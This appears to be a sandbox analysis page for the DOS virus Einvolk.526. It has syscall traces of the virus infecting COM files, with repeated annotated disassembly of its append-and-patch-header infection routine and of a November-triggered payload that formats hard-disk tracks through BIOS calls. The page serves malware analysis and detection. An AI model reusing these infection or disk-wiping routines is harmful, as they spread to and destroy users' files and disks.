Sample viewer

vx.netlux.org/Virus.DOS.Einvolk.526


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:31.568344138Z 71 PC: 12ac3 | Get current directory
2018-12-17T23:10:31.57257167Z 47 PC: 12ac8 | Get disk transfer address
2018-12-17T23:10:31.574275345Z 26 PC: 12ad9 | Set disk transfer address
2018-12-17T23:10:31.575903218Z 78 PC: 12ae7 | Find first file
2018-12-17T23:10:31.583033451Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.60191454Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:31.610391236Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.618279405Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
; For detection: the appended length varies per file (526..625 bytes), so a fixed size delta is not a reliable indicator.
2018-12-17T23:10:31.620808883Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 591 bytes here, i.e. DL = 65
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:31.623457135Z 64 PC: 12bcf | Write file or device (Write 591 bytes on handle 5)
2018-12-17T23:10:31.63224145Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.638142982Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.64634975Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.648241088Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.657917412Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.670822809Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.675023651Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.686612012Z 61 PC: 12b8c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:31.696669682Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.704607574Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:31.70664691Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 602 bytes here, i.e. DL = 76
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:31.71111764Z 64 PC: 12bcf | Write file or device (Write 602 bytes on handle 5)
2018-12-17T23:10:31.721284477Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.723319194Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.731748702Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.733654647Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.742466844Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.755044395Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.759128428Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.770461708Z 61 PC: 12b8c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:31.778602833Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.786625635Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:31.788655834Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 607 bytes here, i.e. DL = 81
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:31.792649818Z 64 PC: 12bcf | Write file or device (Write 607 bytes on handle 5)
2018-12-17T23:10:31.801973327Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.804037921Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.811429376Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.813924199Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.822415262Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.833396469Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.83765942Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.848796119Z 61 PC: 12b8c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:31.856285759Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.864456991Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:31.866917469Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 613 bytes here, i.e. DL = 87
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:31.869635252Z 64 PC: 12bcf | Write file or device (Write 613 bytes on handle 5)
2018-12-17T23:10:31.879360286Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.881207892Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.888350639Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.890619607Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.89982794Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.91103405Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.914386597Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.92571035Z 61 PC: 12b8c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:31.93308896Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.940243659Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:31.94310396Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 618 bytes here, i.e. DL = 92
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:31.945764314Z 64 PC: 12bcf | Write file or device (Write 618 bytes on handle 5)
2018-12-17T23:10:31.954617669Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.957392289Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.965342856Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.96727505Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.976788206Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.987872228Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.991011483Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.002202515Z 61 PC: 12b8c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:32.010108107Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.017273216Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:32.019345725Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 624 bytes here, i.e. DL = 98
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:32.022276559Z 64 PC: 12bcf | Write file or device (Write 624 bytes on handle 5)
2018-12-17T23:10:32.032392548Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:32.034258318Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:32.042555757Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.04450855Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.05323685Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.064350387Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.067536901Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.078241338Z 61 PC: 12b8c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:32.086927528Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.094666877Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
2018-12-17T23:10:32.096537205Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 535 bytes here, i.e. DL = 9
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-17T23:10:32.09981958Z 64 PC: 12bcf | Write file or device (Write 535 bytes on handle 5)
2018-12-17T23:10:32.108807909Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:32.110687204Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:32.118613946Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.120592568Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.129581057Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.140549661Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.143852795Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.15456192Z 61 PC: 12b8c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:32.162989724Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.166368661Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.168064831Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.17564995Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.187261084Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.190252341Z 59 PC: 12b40 | Change current directory
2018-12-17T23:10:32.194984052Z 78 PC: 12ae7 | Find first file
2018-12-17T23:10:32.202182763Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.213161737Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:32.226523623Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.234526107Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.236855169Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.245321535Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.257037354Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.260547808Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.273687887Z 61 PC: 12b8c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:32.282276304Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.290799417Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.292912662Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.301000797Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.318357559Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.321880867Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.338525668Z 61 PC: 12b8c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:32.347698895Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.355460737Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.357576507Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.366432486Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.378292066Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.381724403Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.393747571Z 61 PC: 12b8c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:32.403300231Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.412058687Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.414203692Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.425281551Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.436372165Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.439748347Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.451931695Z 61 PC: 12b8c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:32.459936494Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.467171434Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.469923922Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.478510004Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.489355466Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.493884616Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.505004414Z 61 PC: 12b8c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:32.512467364Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.519915425Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.522951697Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.535060615Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.557858563Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.565766048Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.596266365Z 61 PC: 12b8c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:32.605356986Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.617804982Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.619475134Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.645748489Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.659387015Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.667748735Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.692220952Z 61 PC: 12b8c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:32.717429053Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.725224568Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.727292237Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.735992434Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.744232064Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.746865918Z 26 PC: 12af9 | Set disk transfer address
2018-12-17T23:10:32.748884596Z 59 PC: 12b03 | Change current directory
; Listing printed by the sandbox from the return address of the Get date call (INT 21h AH=2Ah, op 42).
; It is a month check guarding a BIOS disk call and a message, followed by the jump back to the host program.
; In this run the trace logs no display of the SI+0x2e0 string, which is consistent with the jne below being taken.
; For detection: the disk call is INT 13h, not INT 21h, and no such call has a row in this syscall table.
2018-12-17T23:10:32.755310405Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb    ; DH = month returned by Get date; 0x0b = November
0x12b0a: jne 0x12b2b    ; any other month: skip straight to the host hand-off
0x12b0c: mov ch, 0    ; CH = track counter, starts at 0
0x12b0e: mov ax, 0x50d    ; AH = 05h, BIOS disk "format track"; AL = 0x0d
0x12b11: mov cl, 1    ; reloaded on every pass, so CX is non-zero when loopne decrements it
0x12b13: mov dx, 0x80    ; DH = head 0, DL = 80h = first fixed disk
0x12b16: int 0x13    ; BIOS disk service; destructive to the addressed track
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e    ; repeat until CH reaches 0x0d, i.e. tracks 0..12 (assuming INT 13h preserves CX)
0x12b1f: call 0x12b64    ; helper outside this listing
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si    ; DX = SI + 0x2e0, the '$'-terminated message
0x12b27: mov ah, 9    ; INT 21h AH=09h, display string
0x12b29: int 0x21
0x12b2b: mov bx, 0x100    ; 0x100 = entry offset of a COM image
0x12b2e: push bx
0x12b2f: ret    ; push + ret acts as a near jump to offset 0x100, handing control to the host program
0x12b30: cmp byte ptr [si + 0x2d7], 1    ; not reached by fall-through (follows the ret); part of another path
0x12b35: je 0x12aec    ; 0x12aec lies just after the find-file call site (PC 12ae7), presumably the search loop - confirm
2018-12-17T23:10:32.758101545Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.121885949Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.12502937Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.125949107Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.126761552Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.132794625Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.153246417Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.159666019Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.166639274Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
; For detection: the appended length varies per file (526..625 bytes), so a fixed size delta is not a reliable indicator.
2018-12-25T12:54:09.167976309Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 600 bytes here, i.e. DL = 74
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-25T12:54:09.169942297Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.177671512Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.179022681Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.185241455Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.186618178Z 62 PC: 12bfc | Close file
